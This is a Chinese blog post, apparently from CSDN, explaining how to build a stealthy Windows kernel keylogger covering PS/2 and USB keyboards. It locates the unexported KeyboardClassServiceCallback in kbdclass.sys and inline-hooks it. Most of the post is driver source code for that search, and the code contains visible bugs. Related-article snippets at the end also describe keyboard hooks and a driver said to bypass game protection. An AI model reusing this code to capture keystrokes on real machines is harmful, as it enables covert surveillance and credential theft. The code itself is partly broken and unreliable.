Hook KeyboardClassServiceCallback实现键盘 Logger

最新推荐文章于 2020-12-15 15:22:36 发布
最新推荐文章于 2020-12-15 15:22:36 发布
阅读量9.1k 收藏 12
点赞数
分类专栏: 驱动 文章标签: hook object null 扩展 keyboard ddk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mergerly/article/details/4809363
版权

 用DeviceTree 可以看到PS/2键盘的端口驱动是i8042prt,USB键盘的端口驱动是Kbdhid。无论是PS/2 键盘还是USB键盘,在端口驱动处理完IRP之后都会调用上层处理的回调函数,即KbdClass 处理输入数据的函数。Hook 这个回调函数,不但可以实现兼容PS/2 键盘和USB 键盘的Logger,而且比分层驱动的方法更加隐蔽。

Kbdclass的这个回调函数是未导出的,不过在DDK的代码中,我们可以找到这个函数,即kbdclass.c中的KeyboardClassServiceCallback函数。在内核中寻找这个函数可以用特征码搜索,不过楚狂人提出一种改进的方法。我们用这个方法来实现。

根据前人的指示(以PS/2 键盘为例):

(1)KeyboardClassServiceCallback 函数指针应该保存在i8042prt 生成的设备的自定义扩展中。

(2)KeyboardClassServiceCallback的开始地址应该在内核模块KbdClass中。

(3)内核模块KbcClass生成的一个设备对象的指针也保存在端口驱动的设备扩展中,并且在KeyboardClassServiceCallback的指针之前。

根据这三点,我们可以打开端口驱动的驱动对象,得到其设备扩展。然后遍历KdbClass下的所有设备,查找其中一个被保存在端口设备扩展中的设备对象指针,然后在从这个指针开始寻找回调函数。

实现代码如下:

NTSTATUS SearchOldFunctionAddress(IN PDRIVER_OBJECT DriverObject)
{
//定义一些局部变量
NTSTATUS status = STATUS_UNSUCCESSFUL;
int i = 0;
UNICODE_STRING uniNtNameString;
PDEVICE_OBJECT pTargetDeviceObject = NULL;   //目标设备
PDRIVER_OBJECT KbdDriverObject = NULL;    //类驱动
PDRIVER_OBJECT KbdhidDriverObject = NULL;   //USB 端口驱动
PDRIVER_OBJECT Kbd8042DriverObject = NULL;   //PS/2 端口驱动
PDRIVER_OBJECT UsingDriverObject = NULL;
PDEVICE_OBJECT UsingDeviceObject = NULL;

PVOID KbdDriverStart = NULL;   //类驱动起始地址
ULONG KbdDriverSize = 0;
PVOID UsingDeviceExt = NULL;

//这部分代码打开PS/2键盘的驱动对象
RtlInitUnicodeString(&uniNtNameString,PS2KBD_DRIVER_NAME);
status = ObReferenceObjectByName(
   &uniNtNameString,
   OBJ_CASE_INSENSITIVE,
   NULL,
   0,
   IoDriverObjectType,
   KernelMode,
   NULL,
   &Kbd8042DriverObject
   );
if (!NT_SUCCESS(status))
{
   DbgPrint("Couldn't get the PS/2 driver Object/n");
}
else
{
   //解除引用
   ObDereferenceObject(Kbd8042DriverObject);
   DbgPrint("Got the PS/2 driver Object/n");
}

//打开USB 键盘的端口驱动
RtlInitUnicodeString(&uniNtNameString,USBKBD_DRIVER_NAME);
status = ObReferenceObjectByName(
   &uniNtNameString,
   OBJ_CASE_INSENSITIVE,
   NULL,
   0,
   IoDriverObjectType,
   KernelMode,
   NULL,
   &KbdhidDriverObject
   );
if (!NT_SUCCESS(status))
{
   DbgPrint("Couldn't get the USB driver Object/n");
}
else
{
   ObDereferenceObject(KbdhidDriverObject);
   DbgPrint("Got the USB driver Object/n");
}

//如果同时有两个键盘 返回失败
if (Kbd8042DriverObject && KbdhidDriverObject)
{
   DbgPrint("More than one keyboard!/n");
   return STATUS_UNSUCCESSFUL;
}

//两种键盘都没有 也返回失败
if (!Kbd8042DriverObject && KbdhidDriverObject)
{
   DbgPrint("Not found keyboard!/n");
   return STATUS_UNSUCCESSFUL;
}

//找到合适的驱动对象
UsingDriverObject = Kbd8042DriverObject ? Kbd8042DriverObject : KbdhidDriverObject;
//找到该驱动对象下的第一个设备对象
UsingDeviceObject = UsingDriverObject->DeviceObject;
//找到该设备的设备扩展
UsingDeviceExt = UsingDeviceObject->DeviceExtension;

//搜索过程,遍历KdbClass 下面的所有设备,这些设备中有一个被保存在端口驱动
//的设备扩展,然后在设备扩展中找回调函数

RtlInitUnicodeString(&uniNtNameString, KBD_DRIVER_NAME);
status = ObReferenceObjectByName (
        &uniNtNameString,
        OBJ_CASE_INSENSITIVE,
        NULL,
        0,
        IoDriverObjectType,
        KernelMode,
        NULL,
        &KbdDriverObject
        );
    // 如果失败了就直接返回
    if(!NT_SUCCESS(status))
    {
        DbgPrint("Couldn't get the MyTest Device Object/n");
        return STATUS_UNSUCCESSFUL;
    }
    else
    {
        // 这个打开需要解应用。
        ObDereferenceObject(DriverObject);
    }

//遍历KbdDriverObject 下的设备对象
pTargetDeviceObject = KbdDriverObject->DeviceObject;
while (pTargetDeviceObject)
{
   PBYTE DeviceExt;
   DeviceExt = (PBYTE)UsingDeviceObject;
   //遍历我们先找到的端口驱动的设备扩展下的每个指针
   for (;i<4096;i++,DeviceExt += sizeof(PBYTE))
   {
    PVOID tmp;
    if (!MmIsAddressValid(DeviceExt))
    {
     break;
    }

    //找到后填写到下面的全局变量中,如果已经找到 直接退出
    if (gKbdCallBack.classDeviceObject && gKbdCallBack.serviceCallBack)
    {
     status = STATUS_SUCCESS;
     break;
    }

    //在端口驱动的设备扩展中,找到了类驱动的设备对象,填好类驱动设备对象后继续
    tmp = *(PVOID*)DeviceExt;
    if (tmp == pTargetDeviceObject)
    {
     gKbdCallBack.classDeviceObject = (PDEVICE_OBJECT)tmp;
     DbgPrint("classDeviceObject %8x/n",tmp);
     continue;
    }

    //如果在设备扩展中找到一个地址位于KbdClass 模块中,就认为这是我们要的回调函数地址
    KbdDriverStart = (ULONG)GetModlueBaseAdress( "kbdclass.sys",0 );
    DbgPrint("kbdclass.sys: 0x%08lx/n", (PVOID)KbdDriverStart);
    KbdDriverSize = 0x2000;   //为了搜索快点,Kbdclass.sys的模块大小实际上不是这么小
   
    if ((tmp > KbdDriverStart)&&(tmp < (PBYTE)KbdDriverStart+KbdDriverSize)&&MmIsAddressValid(tmp))
    {
     //记录回调函数的地址
     gKbdCallBack.serviceCallBack = (KeyboardClassServiceCallback)tmp;
     //PVOID AddrServiceCallBack = (PVOID *)DeviceExt;
     DbgPrint("serviceCallBack :%8x/n",tmp);
    }
   }
  
   //换下一个设备,继续遍历
   pTargetDeviceObject = pTargetDeviceObject->NextDevice;
}

//如果成功找到 可以返回了
return status;
}

找到函数地址后,inline hook之即可。

vc++实现Inline hook KeyboardClassServiceCallback实现键盘记录
尹成的技术博客
07-30 7200
/* */#ifndef _DBGHELP_H#define _DBGHELP_H 1#include #define dprintf if (DBG) DbgPrint#define nprintf DbgPrint#define kmalloc(_s) ExAllocatePoolWithTag(NonPagedPool, _s, SYSQ)//#define kf
linux ps2键盘驱动,通用键盘鼠标模拟(包括USB和PS2)
weixin_31221157的博客
05-15 828
通过直接调用Kbdclass的回调函数KeyboardClassServiceCallback直接给上层发送键盘驱动。这个方法网上已经公开,参考Hook KeyboardClassServiceCallback实现键盘 Logger,其他的还有很多,可以到网上去查。简单说一下没有公开的部分,就是按下和松开的模拟,已经扩展键的模拟。模拟主要是构造KEYBOARD_INPUT_DATA结构,按下和松开...
KeyboardClassServiceCallback
06-30
KeyboardClassServiceCallback
剖析一个典型的Keyboard_Hook
a519609598的博客
05-11 371
//本人巨菜,纯粹的学习笔记 //高手飘过就可以了 //不当之处还请指出,谢谢了. //先mark下,回头再弄,笔记本没电了... 1.键盘过滤 2.深入native application 3.进程与线程 EPROCESS 分析 //关于I/O堆栈 1.当前设备堆栈不对IRP做任何处理. //给出一个通用的DispatchCommon函数 NTSTATU...
KEYBOARD HOOK
blessyou312的专栏
12-21 1307
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){ BOOL bKeyUp = lParam & (1  int x=0; int y=0; if (bKeyUp && wParam == VK_LEFT && nCode == HC_ACTION)  {  x=38;  y=444; } else if(
inline hook 可以实现兼容PS/2键盘和USB键盘的Logge 源代码
10-21
键盘LoggerHook 键盘类驱动Kbdclass的分发函数,在类驱动的下面是端口驱动。用DeviceTree 可以看到PS/2键盘的端口驱动是i8042prt,USB键盘的端口驱动是Kbdhid。无论是PS/2 键盘还是USB键盘,在端口驱动处理完IRP...
KeyMouse.zip_KeyMouse.zip_kbdcla_通用键盘_鼠标 ps2 usb_鼠标 驱动
07-14
这个方法网上已经公开,参考 Hook KeyboardClassServiceCallback实现键盘 Logger,其他的还有很多,可以到网上去查。 简单说一下没有公开的部分,就是按下和松开的模拟,已经扩展键的模拟。 模拟主要是构造...
keyboard hook
基岩的专栏
12-17 3675
http://blog.youkuaiyun.com/van_ni/archive/2006/03/11/622112.aspx function StorePage(){d=document;t=d.selection?(d.selection.type!=None?d.selection.createRange().text:):(d.getSelection?d.getSelection
KeyboardHook
11-14
键盘hook,拦截屏蔽键盘部分按键demo,vs+mfc实现,可执行
KeyboardHook  键盘钩子
07-14
KeyboardHook  键盘钩子 KeyboardHook  键盘钩子 KeyboardHook  键盘钩子 KeyboardHook  键盘钩子 KeyboardHook  键盘钩子
DDK虚拟键盘鼠标驱动VC6.0源码
06-22
1、DDK模式 2、虚拟键盘鼠标驱动源码 3、过HP、NP、盛大等主流游戏保护 4、虚拟驱动只支持32位windows操作系统
驱动 按键连发工具源码
08-24
驱动调用KeyboardClassServiceCallback函数模拟键的按下与释放。 XP SP3中文版测试有效。查找函数用的是硬编码,不通用,供学习交流。 包含应用程序和驱动文件的源码。
python keyboard hook_pyhooks方法实现键盘监控源码示例
weixin_39599097的博客
12-15 515
pyhooks方法实现键盘监控源码示例,pyhooks实现键盘监控,F12终止程序。这是一个很酷的python小程序,和大家一同分享。第一次运行时,提示没有安装pythoncom模块;承后安装了pywin32,安装后可以正常运行。这里会遇到一个问题就是可能会导致机器发卡,特别是在中断程序运行之后。你会发现鼠标会出现一段时间的自由晃动(好奇怪哦...)后来找不到原因感觉主要是事件频率过高,程序会经常...
键盘驱动笔记
04-13 3752
前段时间想写一个简单的键盘驱动,就找网上找了一些文档看看。JIURL的键盘驱动5篇文章都很精彩,让人很快就能明白键盘驱动的原理。一般情况微软建议写的键盘驱动都是属于keyboard filter driver,它位于kbdclass和i8042prt驱动之间。利用IOCTL_INTERNAL_KEYBOARD_CONNECT来挂接KeyboardClassServiceCallback,然后在I8
Windows鼠标键盘(PS2)驱动框架
xiejianjun417的专栏
05-24 8698
常用的鼠标类型:串口鼠标、PS/2鼠标、USB鼠标(HID)常用的键盘类型:串口键盘、PS/2鼠标、USB键盘(HID)非HID鼠标键盘(PS/2鼠标键盘)物理配置方式上图左边展示了键盘鼠标设备通过独立的控制器连接到系统总线。一种典型的配置由通过i8042控制器操作的PS/2类型键盘,和通过串口操作的串口鼠标组成。上图右边展示了键盘鼠标设备通过集成的键盘鼠标控制器连接到系统总线。一种典型的配置由通...
Keyboard/Mouse驱动驱动的工作原理
weixin_33885253的博客
06-29 2258
不管是USB或者8042或者虚拟的Keyboard/Mouse,设备栈最上层都是Kbdclass或者Mouclass,操作系统会专门有个现成不停的向设备栈发送Read IRP。 kd> !devstack 80d8eaa0 !DevObj !DrvObj !DevExt ObjectName > 80d8eaa0 \Driver\Kbdc...
C# winIO32位,64位的使用
热门推荐
马农里奥
01-18 1万+
下载地址: http://www.internals.com/utilities/WinIo.zip 一个按键的消息产生流程如下: 1)硬件中断/硬件端口数据 WinIO能模拟,或者修改IDT是在这一层 2)键盘Port驱动(USB or PS/2) Filter驱动在此 KeyboardClassServiceCallback也在这一层被调用 3)kb
Windows键盘驱动结构与消息机制
Zpeg的博客
03-30 2563
转自 豆瓣本文主要介绍按键消息是如何传递到窗口并转化为具体的按键消息的。Windows系统是事件驱动的多任务系统,其中按键和鼠标是主要的事件。按键是由键盘驱动获得并转换,然后广播给各个窗口。整个架构的核心是csrss.exe这个进程,对于“一般”的窗口,收到的消息都是由这个任务产生的。该任务负责用CreateFile方式打开键盘设备并读取信息,获得对应的键码并发送给特定的进程,csrss.exe的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值